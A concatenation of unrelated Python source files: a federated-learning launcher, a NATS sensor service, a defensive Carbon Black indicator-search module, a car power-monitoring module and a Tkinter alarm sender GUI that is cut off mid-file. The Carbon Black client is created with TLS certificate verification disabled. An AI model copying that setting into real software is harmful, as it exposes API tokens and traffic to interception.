logging.info("load_data. dataset_name = %s" % dataset_name)
args.data_silo_num_in_total = 233
fed_train_map_file = os.path.join(args.data_dir, "mini_gld_train_split.csv")
fed_test_map_file = os.path.join(args.data_dir, "mini_gld_test.csv")
args.data_dir = os.path.join(args.data_dir, "images")
(
train_data_num,
test_data_num,
train_data_global,
test_data_global,
train_data_local_num_dict,
train_data_local_dict,
test_data_local_dict,
class_num,
) = load_partition_data_landmarks(
dataset=dataset_name,
data_dir=args.data_dir,
fed_train_map_file=fed_train_map_file,
fed_test_map_file=fed_test_map_file,
partition_method=None,
partition_alpha=None,
silo_number=args.data_silo_num_in_total,
batch_size=args.batch_size,
)
elif dataset_name == "gld160k":
logging.info("load_data. dataset_name = %s" % dataset_name)
args.data_silo_num_in_total = 1262
fed_train_map_file = os.path.join(args.data_dir, "federated_train.csv")
fed_test_map_file = os.path.join(args.data_dir, "test.csv")
args.data_dir = os.path.join(args.data_dir, "images")
(
train_data_num,
test_data_num,
train_data_global,
test_data_global,
train_data_local_num_dict,
train_data_local_dict,
test_data_local_dict,
class_num,
) = load_partition_data_landmarks(
dataset=dataset_name,
data_dir=args.data_dir,
fed_train_map_file=fed_train_map_file,
fed_test_map_file=fed_test_map_file,
partition_method=None,
partition_alpha=None,
silo_number=args.data_silo_num_in_total,
batch_size=args.batch_size,
)
else:
if dataset_name == "cifar10":
# TODO: find a bette way for difference between clients and server
if args.silo_rank == 0:
logging.info("loading cifa10 for server")
data_loader = load_partition_data_cifar10
else:
logging.info("loading cifa10 for client")
data_loader = load_partition_data_cifar10_cross_silo
elif dataset_name == "cifar100":
data_loader = load_partition_data_cifar100
elif dataset_name == "cinic10":
data_loader = load_partition_data_cinic10
else:
data_loader = load_partition_data_cifar10
(
train_data_num,
test_data_num,
train_data_global,
test_data_global,
train_data_local_num_dict,
train_data_local_dict,
test_data_local_dict,
class_num,
) = data_loader(
args.dataset,
args.data_dir,
args.partition_method,
args.partition_alpha,
args.data_silo_num_in_total,
args.batch_size,
args.silo_proc_num,
)
dataset = [
train_data_num,
test_data_num,
train_data_global,
test_data_global,
train_data_local_num_dict,
train_data_local_dict,
test_data_local_dict,
class_num,
]
# TODO: is it requried? Why others have?
# args.client_silo_num_in_total = silo_num
return dataset
def create_model(args, model_name, output_dim):
logging.info("create_model. model_name = %s, output_dim = %s" % (model_name, output_dim))
model = None
if model_name == "lr" and args.dataset == "mnist":
logging.info("LogisticRegression + MNIST")
model = LogisticRegression(28 * 28, output_dim)
elif model_name == "rnn" and args.dataset == "shakespeare":
logging.info("RNN + shakespeare")
model = RNN_OriginalFedAvg()
elif model_name == "cnn" and args.dataset == "femnist":
logging.info("CNN + FederatedEMNIST")
model = CNN_DropOut(False)
elif model_name == "resnet18_gn" and args.dataset == "fed_cifar100":
logging.info("ResNet18_GN + Federated_CIFAR100")
model = resnet18()
elif model_name == "rnn" and args.dataset == "fed_shakespeare":
logging.info("RNN + fed_shakespeare")
model = RNN_OriginalFedAvg()
elif model_name == "lr" and args.dataset == "stackoverflow_lr":
logging.info("lr + stackoverflow_lr")
model = LogisticRegression(10004, output_dim)
elif model_name == "rnn" and args.dataset == "stackoverflow_nwp":
logging.info("CNN + stackoverflow_nwp")
model = RNN_StackOverFlow()
elif model_name == "resnet56":
model = resnet56(class_num=output_dim)
elif model_name == "mobilenet":
model = mobilenet(class_num=output_dim)
# TODO
elif model_name == "mobilenet_v3":
"""model_mode \in {LARGE: 5.15M, SMALL: 2.94M}"""
model = MobileNetV3(model_mode="LARGE")
elif model_name == "efficientnet":
model = EfficientNet()
return model
if __name__ == "__main__":
# quick fix for issue in MacOS environment: https://github.com/openai/spinningup/issues/16
if sys.platform == "darwin":
os.environ["KMP_DUPLICATE_LIB_OK"] = "True"
# parse python script input parameters
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
args = add_args(parser)
if args.enable_cuda_rpc and (not args.gpu_mapping_file):
parser.error("Need to specify gpu_mapping for using cuda_rpc")
if (args.backend == "MQTT" or args.backend == "MQTT_S3") and not args.mqtt_config_path:
parser.error("Please add argument --mqtt_config_path")
if args.backend == "MQTT_S3" and not args.mqtt_config_path:
parser.error("Please add argument --s3_config_path")
comm, process_id, worker_number = FedML_init()
args.worker_silo_num = args.data_silo_num_in_total + 1
args.local_rank = process_id
args.silo_proc_num = args.nnode * args.nproc_per_node
args.silo_proc_rank = args.silo_node_rank * args.nproc_per_node + args.local_rank
# # customize the process name
str_process_name = "FedAvg (distributed):" + str(args.silo_rank)
setproctitle.setproctitle(str_process_name)
# customize the log format
logging.basicConfig(
level=logging.INFO,
format=str(args.silo_rank) + " - %(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s",
datefmt="%a, %d %b %Y %H:%M:%S",
)
logging.info(args)
hostname = socket.gethostname()
logging.info(
"#############process ID = "
+ str(args.silo_rank)
+ ", host name = "
+ hostname
+ "########"
+ ", process ID = "
+ str(os.getpid())
+ ", process Name = "
+ str(psutil.Process(os.getpid()))
)
# initialize the wandb machine learning experimental tracking platform (https://www.wandb.com/).
if args.silo_rank == 0 and args.silo_proc_rank == 0:
print("wandb.init")
# Set the random seed. The np.random seed determines the dataset partition.
# The torch_manual_seed determines the initial weight.
# We fix these two, so that we can reproduce the result.
random.seed(0)
np.random.seed(0)
torch.manual_seed(0)
torch.cuda.manual_seed_all(0)
# Please check "GPU_MAPPING.md" to see how to define the topology
logging.info(
"silo_rank = %d, silo_proc_rank = %d, silo_proc_num = %d"
% (args.silo_rank, args.silo_proc_rank, args.silo_proc_num)
)
device = mapping_processes_to_gpu_device_from_yaml_file(
args.silo_rank, args.worker_silo_num, args.gpu_mapping_file, args.gpu_mapping_key, check_cross_silo=True
)
# load data
dataset = load_data(args, args.dataset)
[
train_data_num,
test_data_num,
train_data_global,
test_data_global,
train_data_local_num_dict,
train_data_local_dict,
test_data_local_dict,
class_num,
] = dataset
bind_port = 10000
def fedml_test():
# create model.
# Note if the model is DNN (e.g., ResNet), the training will be very slow.
# In this case, please use our FedML distributed version (./fedml_experiments/distributed_fedavg)
model = create_model(args, model_name=args.model, output_dim=dataset[7])
# print(len(train_data_local_num_dict.items()[0][0].items()))
# print(len(train_data_local_num_dict.items()[0][0].))
# start distributed training
FedAvgAPI(
args.silo_rank,
args.worker_silo_num,
device,
None,
model,
train_data_num,
train_data_global,
test_data_global,
train_data_local_num_dict,
train_data_local_dict,
test_data_local_dict,
args,
)
def mqtt_s3_test():
class MqttObserver(observer.Observer):
def receive_message(self, msg_type, msg_params) -> None:
print("receive_message(%s, %s)" % (msg_type, msg_params.to_string()))
mqtt_s3_obj = mqtt_s3.MqttS3CommManager('mqtt_config.yaml', 's3_config.yaml', topic='168',
client_id=client_id, client_num=1,
client_real_ids=json.loads(args.client_ids),
bind_port=bind_port)
#mqtt_s3_obj = mqtt.MqttCommManager('mqtt_config.yaml', topic='fedml_168_', client_id=1, client_num=1)
mqtt_observer = MqttObserver()
mqtt_s3_obj.add_observer(mqtt_observer)
msg_json = '{"msg_type":3,"sender":1,"receiver":0,"model_params":[{"obj1":1},{"obj2":2}]}'
msg_obj = message.Message()
msg_obj.init_from_json_string(msg_json)
#mqtt_s3_obj.send_message(msg_obj)
while True:
mqtt_s3_obj.run_loop_forever()
time.sleep(0.1)
#thread = threading.Thread(target=mqtt_s3_test(),args=10000)
#thread.start()
#thread2 = threading.Thread(target=mqtt_s3_test(),args=10002)
#thread2.start()
client_id = 0
multiprocessing.Process(target=mqtt_s3_test).start()
time.sleep(3)
bind_port = 20000
client_id += 1
multiprocessing.Process(target=mqtt_s3_test).start()
while True:
time.sleep(0.1)
|
main.py | from CommunicationLayer import NATSCommunication
from CommunicationLayer import ServiceRegistry
import asyncio
import argparse
import os
import APIGateway
import cherrypy
import threading
from Sensors import CSVSensor
class Logic:
lastFrame = None
coordinateN = 0
coordinateE = 0
Name = ""
frameRate = 1
args = None
sensor = None
communciator = None
def __init__(self, args):
self.args = args
self.coordinateE = float(args["EastCoordinate"])
self.coordinateN = float(args["NorthCoordiante"])
self.frameRate = int(args["FramesPerSecond"])
self.Name = args["name"]
async def run(self, loop):
self.sensor = self.getSensor()
#communicator
self.communciator = NATSCommunication.NATSCommunication()
self.communciator.logic = self
await self.communciator.connect(args["NATSaddress"])
self.sensor.skipFrames((args["skipFirstNFrames"]))
self.lastFrame = self.sensor.getFrame()
index = 0
while not (self.lastFrame is None):
await self.communciator.sendMessage(self.lastFrame,self.coordinateN,self.coordinateE,self.Name)
print("Image number "+str(index)+" has been sent!")
index +=1
await asyncio.sleep(1//self.frameRate)
self.lastFrame = self.sensor.getFrame()
async def getCommunicator(self):
communciator = NATSCommunication.NATSCommunication()
communciator.logic = self
await communciator.connect(args["NATSaddress"])
return communciator
def getSensor(self):
sensor = CSVSensor.CSVSensor();
sensor.loadCVSFile(args["CSVFile"])
return sensor
def asyncoThreading(loop, logic):
asyncio.set_event_loop(loop)
loop.run_until_complete(logic.run(loop))
ag = argparse.ArgumentParser()
ag.add_argument('-p', "--port", required=False, default="9000", help="Port of the service")
ag.add_argument('-n', "--name", required=False, default="First sensor", help="Name of the sensor")
ag.add_argument('-ns', "--NATSaddress", required=False, default="nats://localhost:4222", help="Address of NATS server")
ag.add_argument('-csv', "--CSVFile", required=False, default="dataset.csv", help="Name of csv file to be used as data")
ag.add_argument('-N', "--NorthCoordiante", required=False, default="40.0", help="North Coordinate of sensor")
ag.add_argument('-E', "--EastCoordinate", required=False, default="40.0", help="East coordinate of sensor")
ag.add_argument('-fps', "--FramesPerSecond", required=False, default="1", help="Frames per second")
ag.add_argument('-r', "--serviceRegistryAddress", required=False, default="http://127.0.0.1:8761/", help="Service registry address")
ag.add_argument('-s', "--skipFirstNFrames", required=False, default="0", help="Skip first N data")
args = vars(ag.parse_args())
args["port"] = int(args["port"])
args["FramesPerSecond"] = int(args["FramesPerSecond"])
args["NorthCoordiante"] = float(args["NorthCoordiante"])
args["EastCoordinate"] = float(args["EastCoordinate"])
args["skipFirstNFrames"] = int(args["skipFirstNFrames"])
#Main program
logic = Logic(args)
loop = asyncio.get_event_loop()
sensorThread = threading.Thread(target=asyncoThreading, args=(loop,logic,))
sensorThread.start()
ServiceRegistry.registry("Sensors",args["name"], port= args["port"],serviceRegistryAddress=args['serviceRegistryAddress'])
API = APIGateway.Gateway(logic)
cherrypy.config.update({'server.socket_port': args["port"]})
cherrypy.config.update({'server.socket_host': '0.0.0.0'})
conf = {
'/': {
'request.dispatch' : cherrypy.dispatch.MethodDispatcher(),
'tools.response_headers.on' : True,
'tools.response_headers.headers' : [('Content-Type', 'text/plain')],
}
}
cherrypy.quickstart(API,'/',conf)
|
carbon_black.py | import time, os, sys
import logging
import threading
import datetime
import pprint
import copy
from configparser import ConfigParser
from threading import Lock, Thread
from lib.constants import FA_HOME
from lib.modules import base_module
import lib.cbapi_3 as cbapi_3
log = logging.getLogger()
class CarbonBlack(base_module.BaseModule):
def __init__(self):
super().__init__(name='CarbonBlack')
log.info('Initializing CarbonBlack module.')
self.config = ConfigParser()
self.config.read(os.path.join(FA_HOME, "etc", "config.ini"))
self.working = self.config.get("general", "working_dir")
self.running = False
# Dict to track all the crits indicator objects and their status
self.crits_data = {
'module_status' : 'initialized',
'indicators' : {}
}
self.data_lock = Lock()
# CB specific things
self.cb_url = self.config.get('module_carbonblack', 'url')
self.cb_token = self.config.get('module_carbonblack', 'token')
self.cb_time_range = self.config.getint('module_carbonblack', 'time_range')
self.results_limit = self.config.getint('module_carbonblack', 'results_limit')
def run(self):
self.running = True
with self.data_lock:
self.crits_data['module_status'] = 'running'
while self.running:
# We need to find indicators that haven't been processed already
cid_list = list(self.crits_data['indicators'].keys())
unprocessed_cids = []
for cid in cid_list:
with self.data_lock:
if not self.crits_data['indicators'][cid]['completed']:
unprocessed_cids.append(cid)
# Now we can start a thread to process them
if len(unprocessed_cids) > 0:
thread = Thread(target=self.run_cb_scan, name='CarbonBlackScanner')
thread.start()
while thread.is_alive() and self.running:
time.sleep(2)
else:
time.sleep(2)
def stop(self):
log.warning("Caught interrupt. Shutting down carbon_black...")
self.running = False
def get_valid_indicator_types(self):
return [
'Windows - FileName',
'Hash - MD5',
'Address - ipv4-addr',
'URI - Domain Name',
'Windows - FilePath',
'Windows - Registry',
'Account',
'String - Windows Shell',
]
def run_cb_scan(self):
# Create a copy of the crits_data so we don't lock it up for a long time while we
# wait for the carbon black scans to complete.
with self.data_lock:
cid_list = list(self.crits_data['indicators'].keys())
for cid in cid_list:
if not self.running:
# Bail out!
return
# Ignore completed indicators
with self.data_lock:
if self.crits_data['indicators'][cid]['completed']:
continue
with self.data_lock:
new_value = self._sanitize_string(self.crits_data['indicators'][cid]['value'], self.crits_data['indicators'][cid]['type'])
time_search = 'server_added_timestamp:[{0} TO *]'.format((datetime.datetime.utcnow() - datetime.timedelta(days=self.cb_time_range)).strftime('%Y-%m-%dT%H:%M:%S'))
cb = cbapi_3.CbApi(self.cb_url, token=self.cb_token, ssl_verify=False)
try:
search = "{} {}".format(new_value, time_search)
procs = cb.process_search(search)
log.info("CarbonBlack search: {} returned {} results.".format(search, procs['total_results']))
if procs['total_results'] == 0:
with self.data_lock:
self.crits_data['indicators'][cid]['status'] = 'Analyzed'
self.crits_data['indicators'][cid]['completed'] = True
elif procs['total_results'] > 0:
with self.data_lock:
# We have hits, so set to 'In Progress'
self.crits_data['indicators'][cid]['status'] = 'In Progress'
# Now gather results data to send to ACE
if 'results' not in self.crits_data['indicators'][cid]:
self.crits_data['indicators'][cid]['results'] = []
_results_data = {}
_results_data['search'] = search
_results_data['hits'] = []
_results_data['total_hits'] = procs['total_results']
current_count = 0
for result in procs['results']:
if current_count > self.results_limit:
break
current_count += 1
_results_data['hits'].append(result)
self.crits_data['indicators'][cid]['results'].append(_results_data)
self.crits_data['indicators'][cid]['completed'] = True
else:
log.error('Received total_results less than 0. WTF?')
except Exception as e:
log.error("{} FAILED. {}".format(new_value, str(e)))
log.error("Indicator ID was: {}".format(cid))
log.info("Enabling indicator {}".format(cid))
with self.data_lock:
self.crits_data['indicators'][cid]['status'] = 'Analyzed'
self.crits_data['indicators'][cid]['completed'] = True
log.info('CarbonBlack searches complete.')
def _sanitize_string(self, value, ind_type):
if ind_type == 'Hash - MD5':
value = 'md5:' + value
return value
if ind_type == 'Address - ipv4-addr':
value = 'ipaddr:' + value
return value
if ind_type == 'URI - Domain Name':
value = 'domain:' + value
return value
if '"' in value:
value = value.replace('"', '\\"')
if '(' in value:
value = value.replace('(', '\\(')
if ')' in value:
value = value.replace(')', '\\)')
value = '"' + value + '"'
#if '(' in value:
# value = value.replace('\\(')
return value
|
power_monitoring.py | import random
import threading
import time
from statistics import mean
from cereal import log
from common.params import Params, put_nonblocking
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE
from selfdrive.swaglog import cloudlog
from common.op_params import opParams
CAR_VOLTAGE_LOW_PASS_K = 0.091 # LPF gain for 5s tau (dt/tau / (dt/tau + 1))
# A C2 uses about 1W while idling, and 30h seens like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6
CAR_CHARGING_RATE_W = 45
VBATT_PAUSE_CHARGING = 11.0 # Lower limit on the LPF car battery voltage
VBATT_INSTANT_PAUSE_CHARGING = 7.0 # Lower limit on the instant car battery voltage measurements to avoid triggering on instant power loss
MAX_TIME_OFFROAD_S = round(3600 * opParams().get('disable_charging'))
MIN_ON_TIME_S = 3600
class PowerMonitoring:
def __init__(self):
self.params = Params()
self.last_measurement_time = None # Used for integration delta
self.last_save_time = 0 # Used for saving current value in a param
self.power_used_uWh = 0 # Integrated power usage in uWh since going into offroad
self.next_pulsed_measurement_time = None
self.car_voltage_mV = 12e3 # Low-passed version of pandaState voltage
self.car_voltage_instant_mV = 12e3 # Last value of pandaState voltage
self.integration_lock = threading.Lock()
car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
if car_battery_capacity_uWh is None:
car_battery_capacity_uWh = 0
# Reset capacity if it's low
self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))
# Calculation tick
def calculate(self, pandaState):
try:
now = sec_since_boot()
# If pandaState is None, we're probably not in a car, so we don't care
if pandaState is None or pandaState.pandaState.pandaType == log.PandaState.PandaType.unknown:
with self.integration_lock:
self.last_measurement_time = None
self.next_pulsed_measurement_time = None
self.power_used_uWh = 0
return
# Low-pass battery voltage
self.car_voltage_instant_mV = pandaState.pandaState.voltage
self.car_voltage_mV = ((pandaState.pandaState.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))
# Cap the car battery power and save it in a param every 10-ish seconds
self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
if now - self.last_save_time >= 10:
put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
self.last_save_time = now
# First measurement, set integration time
with self.integration_lock:
if self.last_measurement_time is None:
self.last_measurement_time = now
return
if (pandaState.pandaState.ignitionLine or pandaState.pandaState.ignitionCan):
# If there is ignition, we integrate the charging rate of the car
with self.integration_lock:
self.power_used_uWh = 0
integration_time_h = (now - self.last_measurement_time) / 3600
if integration_time_h < 0:
raise ValueError(f"Negative integration time: {integration_time_h}h")
self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
self.last_measurement_time = now
else:
# No ignition, we integrate the offroad power used by the device
is_uno = pandaState.pandaState.pandaType == log.PandaState.PandaType.uno
# Get current power draw somehow
current_power = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power is not None:
pass
elif HARDWARE.get_battery_status() == 'Discharging':
# If the battery is discharging, we can use this measurement
# On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in
current_power = ((HARDWARE.get_battery_voltage() / 1000000) * (HARDWARE.get_battery_current() / 1000000))
elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
# TODO: Figure out why this is off by a factor of 3/4???
FUDGE_FACTOR = 1.33
# Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal
def perform_pulse_measurement(now):
try:
HARDWARE.set_battery_charging(False)
time.sleep(5)
# Measure for a few sec to get a good average
voltages = []
currents = []
for _ in range(6):
voltages.append(HARDWARE.get_battery_voltage())
currents.append(HARDWARE.get_battery_current())
time.sleep(1)
current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))
self._perform_integration(now, current_power * FUDGE_FACTOR)
# Enable charging again
HARDWARE.set_battery_charging(True)
except Exception:
cloudlog.exception("Pulsed power measurement failed")
# Start pulsed measurement and return
threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
self.next_pulsed_measurement_time = None
return
elif self.next_pulsed_measurement_time is None and not is_uno:
# On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
# Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
# We shouldn't do this very often, so make sure it has been some long-ish random time interval
self.next_pulsed_measurement_time = now + random.randint(120, 180)
return
else:
# Do nothing
return
# Do the integration
self._perform_integration(now, current_power)
except Exception:
cloudlog.exception("Power monitoring calculation failed")
def _perform_integration(self, t, current_power):
with self.integration_lock:
try:
if self.last_measurement_time:
integration_time_h = (t - self.last_measurement_time) / 3600
power_used = (current_power * 1000000) * integration_time_h
if power_used < 0:
raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh")
self.power_used_uWh += power_used
self.car_battery_capacity_uWh -= power_used
self.last_measurement_time = t
except Exception:
cloudlog.exception("Integration failed")
# Get the power usage
def get_power_used(self):
return int(self.power_used_uWh)
def get_car_battery_capacity(self):
return int(self.car_battery_capacity_uWh)
# See if we need to disable charging
def should_disable_charging(self, pandaState, offroad_timestamp):
if pandaState is None or offroad_timestamp is None:
return False
now = sec_since_boot()
disable_charging = False
disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3)) and (self.car_voltage_instant_mV > (VBATT_INSTANT_PAUSE_CHARGING * 1e3))
disable_charging |= (self.car_battery_capacity_uWh <= 0)
disable_charging &= (not pandaState.pandaState.ignitionLine and not pandaState.pandaState.ignitionCan)
disable_charging &= (not self.params.get_bool("DisablePowerDown"))
disable_charging &= (pandaState.pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected)
disable_charging |= self.params.get_bool("ForcePowerDown")
return disable_charging
# See if we need to shutdown
def should_shutdown(self, pandaState, offroad_timestamp, started_seen):
if pandaState is None or offroad_timestamp is None:
return False
now = sec_since_boot()
panda_charging = (pandaState.pandaState.usbPowerMode != log.PandaState.UsbPowerMode.client)
BATT_PERC_OFF = 10
should_shutdown = False
# Wait until we have shut down charging before powering down
should_shutdown |= (not panda_charging and self.should_disable_charging(pandaState, offroad_timestamp))
should_shutdown |= ((HARDWARE.get_battery_capacity() < BATT_PERC_OFF) and (not HARDWARE.get_battery_charging()) and ((now - offroad_timestamp) > 60))
should_shutdown &= started_seen or (now > MIN_ON_TIME_S)
return should_shutdown
|
sender.py | import datetime
import json
import os
import socket
import threading
import time
import tkinter as tk
import wave
from tkinter import filedialog, messagebox, ttk
from tkinter.ttk import Combobox, Entry, Progressbar
import tkinter.font as tkFont
import pyaudio
import scipy.io.wavfile as wav
from PIL import Image, ImageTk
import selectors
import struct
logo_png = os.path.dirname(os.path.realpath(__file__))+'\\assets\\logo-select.ico'
pausing = False
class MainWindow(object):
def __init__(self, master):
self.master = master
self.master.geometry("500x500")
self.master.title("Electors WiFi Sender")
self.master.iconbitmap(r'{}'.format(logo_png))
self.frame = tk.Frame(master)
self.frame.pack(fill="both", expand=True)
self.frame.configure(background="orange")
self.frame1 = tk.Frame(self.frame)
self.frame1.configure(background= "orange")
self.frame1.place(relx=0.5, rely=0.5, anchor="center", height=500, width=500)
self.mbutton = MainButton(self.frame1)
self.frames = {}
b0 = tk.Button(self.frame1, text="Setting", command=self.setting_window, fg='black', bg="white",
relief='solid',
font=('arial', 10, 'bold'), width='6',
height='1')
self.b1 = tk.Button(self.frame1, text='Emergency Alarm', command=self.emergency_window, fg='black',
bg='white', relief='solid',
width=25, font=('arial', 19, 'bold'))
self.b2 = tk.Button(self.frame1, text='Hourly Bell', command=self.hourlybell_window, fg='black',
bg='white', relief='solid',
width=25,
font=('arial', 19, 'bold'))
b3 = tk.Button(self.frame1, text="Exit", command=self.quiting, fg='black', bg="white",
relief='solid',
font=('arial', 10, 'bold'), width='6',
height='1')
self.b4 = tk.Button(self.frame1, text='Live Anouncement', command=self.live_window, fg='black', bg='white', relief='solid',
width=25, font=('arial', 19, 'bold'))
self.b5 = tk.Button(self.frame1, text='Refresh', command=self.refresh_window, fg='black', bg='white', relief='solid',
width=10, font=('arial', 12, 'bold'))
L1 = tk.Label(self.frame1, text="WiFi Sender", font=('arial', 15, 'bold'), bg='orange')
L1.place(relx=.5, rely=0.06, anchor="center")
b0.place(x=0, y=0)
b3.place(x=2, relx=0.88, rely=0)
self.b1.place(relx=0.5, rely=0.2, anchor='center')
self.b2.place(relx=0.5, rely=0.4, anchor='center')
self.b4.place(relx=0.5, rely=0.6, anchor='center')
self.b5.place(relx=0.5, rely=0.9, anchor='center')
today = str(datetime.date.today())
self.clock = tk.Label(self.frame1, font=('arial', 10, 'bold'), fg='black', bg='white', width=12)
self.date = tk.Label(self.frame1, text=today, font=('arial', 10, 'bold'), fg='black', bg='white', width=12)
self.clock.place(relx=0.75, rely=0.8, anchor='center')
self.date.place(relx=0.25, rely=0.8, anchor='center')
self.b1['state'] = 'disabled'
self.b2['state'] = 'disabled'
self.b4['state'] = 'disabled'
self.show_clk()
self.gone_ = False
def refresh_window(self):
self.x = bool1.get()
self.y = bool2.get()
self.z = bool3.get()
if self.x or self.y or self.z:
self.b1['state'] = 'normal'
self.b2['state'] = 'normal'
self.b4['state'] = 'normal'
else:
self.b1['state'] = 'disabled'
self.b2['state'] = 'disabled'
self.b4['state'] = 'disabled'
def quiting(self):
self.master.destroy()
def hide(self):
self.master.withdraw()
def setting_window(self):
if not self.gone_:
self.hide()
self.page1 = PageOne(self)
w = self.page1.prove()
self.gone_ = w
else:
if self.page1 != None:
w = self.page1.show()
self.gone_ = w
if w == False:
self.setting_window()
def emergency_window(self):
self.hide()
PageTwo(self)
def hourlybell_window(self):
self.hide()
PageThree(self)
def live_window(self):
self.hide()
PageFour(self)
def show(self):
#self.master.state("zoomed")
self.master.update()
self.master.deiconify()
def show_clk(self):
timenow = time.strftime('%H:%M:%S %p')
self.clock['text'] = timenow
#self.clock.config(text=timer)
self.clock.after(1000, self.show_clk)
class MainButton(object):
def __init__(self, master):
self.master = master
self.f = 'name.txt';
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# t1 = threading.Thread(target=self._runn)
# t1.start()
def _runn(self):
while True:
self.ip = None
self.port = None
self.addr = (self.ip, self.port)
try:
self.sock.connect(self.addr)
except Exception as e:
print(e)
time.sleep(2)
continue
else:
break
def error1(self):
root = tk.Tk()
root.withdraw()
messagebox.showerror("Error", "Action is undone! \nSelect a file first")
def exit1(self):
exit()
def stop(self):
global pausing
pausing = True
MESSAGE1 = 'stop'
self.sock.send(bytes(MESSAGE1, 'ascii'))
time.sleep(0.1)
def alarm(self):
if not os.path.exists(self.f):
self.error1()
else:
global pausing
pausing = True
MESSAGE2 = 'alarm'
self.sock.send(bytes(MESSAGE2, 'ascii'))
time.sleep(0.1)
def live(self):
MESSAGE3 = 'live'
self.sock.send(bytes(MESSAGE3, 'ascii'))
time.sleep(2)
ip = None
port = None
Live_Client(ip, port)
#Settings
class PageOne(tk.Toplevel):
def __init__(self, master):
self.master1 = master
tk.Toplevel.__init__(self)
self.geometry("500x500")
self.title("Settings")
#self.state("zoomed")
self.frame = tk.Frame(self)
self.frame.pack(fill="both", expand=True)
self.frame.configure(background="white")
self.frame1 = tk.Frame(self.frame)
self.frame1.configure(background="orange")
self.frame1.place(relx=0.5, rely=0.5, anchor="center", height=500, width=500)
L1 = tk.Label(self.frame1, text="Speaker 1: ", font=('arial', 15, 'bold'), bg="orange")
L2 = tk.Label(self.frame1, text="Speaker 2: ", font=('arial', 15, 'bold'), bg='orange')
L3 = tk.Label(self.frame1, text="SETTINGS", font=('arial', 15, 'bold'), bg='orange')
L4 = tk.Label(self.frame1, text="Option to Connect: -S1 (Speaker 1) -S2 (Speaker 2)", font=('arial', 10, 'bold'),
bg='orange')
L5 = tk.Label(self.frame1, text=":", font=('arial', 15, 'bold'), bg='orange')
L6 = tk.Label(self.frame1, text=":", font=('arial', 15, 'bold'), bg='orange')
L7 = tk.Label(self.frame1, text="IP Address", font=('arial', 12, 'bold'), bg='orange')
L8 = tk.Label(self.frame1, text="Port", font=('arial', 12, 'bold'), bg='orange')
self.set_button1 = tk.Button(self.frame1, text='Set', command=self.toggle_button_1, fg='black',
relief = 'raised',bg='white', width=6, height=1, font=('arial', 10, 'bold'))
self.set_button2 = tk.Button(self.frame1, text='Set', command=self.toggle_button_2, fg='black',
relief = 'raised', bg='white', width=6, height=1, font=('arial', 10, 'bold'))
set_button4 = tk.Button(self.frame1, text='Back', command=self.backOpt, fg='black',
bg='white', relief='solid', width=6, height=1, font=('arial', 10, 'bold'))
E1 = Entry(self.frame1, font=('arial', 15, 'bold'), textvariable=ip_input, width=14)
E2 = tk.Entry(self.frame1, font=('arial', 15, 'bold'), textvariable=ip_input_1, width=14)
E1_1 = tk.Entry(self.frame1, font=('arial', 15, 'bold'), textvariable=port_input, width=5)
E1_2 = tk.Entry(self.frame1, font=('arial', 15, 'bold'), textvariable=port_input_1, width=5)
self.switch_variable = tk.StringVar()
self.both_button = tk.Radiobutton(self.frame1, text="BOTH", variable=self.switch_variable,
command=self.selected_serv,indicatoron=False, value="both", width=8, font=('arial', 10, 'bold'))
self.s1_button = tk.Radiobutton(self.frame1, text="S1 Only", variable=self.switch_variable,
command=self.selected_serv,indicatoron=False, value="s1", width=8,font=('arial', 10, 'bold'))
self.s2_button = tk.Radiobutton(self.frame1, text="S2 Only", variable=self.switch_variable,
command=self.selected_serv, indicatoron=False, value="s2", width=8,font=('arial', 10, 'bold'))
path1 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\logo-final.png'
path2 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\elector_logo.gif'
path3 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\setting_logo.gif'
load_img = Image.open(path1)
load_img2 = Image.open(path2)
load_img3 = Image.open(path3)
wd = 70
ht = 70
wd1 = 80
ht1 = 80
img_res2 = load_img2.resize((wd, ht), Image.ANTIALIAS)
img_res1 = load_img.resize((wd1, ht1), Image.ANTIALIAS)
img_res3 = load_img3.resize((wd, ht), Image.ANTIALIAS)
get_img = ImageTk.PhotoImage(img_res1)
img_logo = tk.Label(self.frame1, image=get_img, bg="orange")
get_img2 = ImageTk.PhotoImage(img_res2)
img_logo2 = tk.Label(self.frame1, image=get_img2, bg="orange")
get_img3 = ImageTk.PhotoImage(img_res3)
img_logo3 = tk.Label(self.frame1, image=get_img3, bg='orange')
img_logo.image = get_img
img_logo2.image = get_img2
img_logo3.image = get_img3
img_logo.place(relx=0.1, rely=0.15, anchor="w")
img_logo2.place(relx=0.73, rely=0.14, anchor="w")
img_logo3.place(relx=0.42, rely=0.14, anchor="w")
self.both_button.place(relx=.7, rely=.8, anchor="center")
self.s1_button.place(relx=.3, rely=.8, anchor="center")
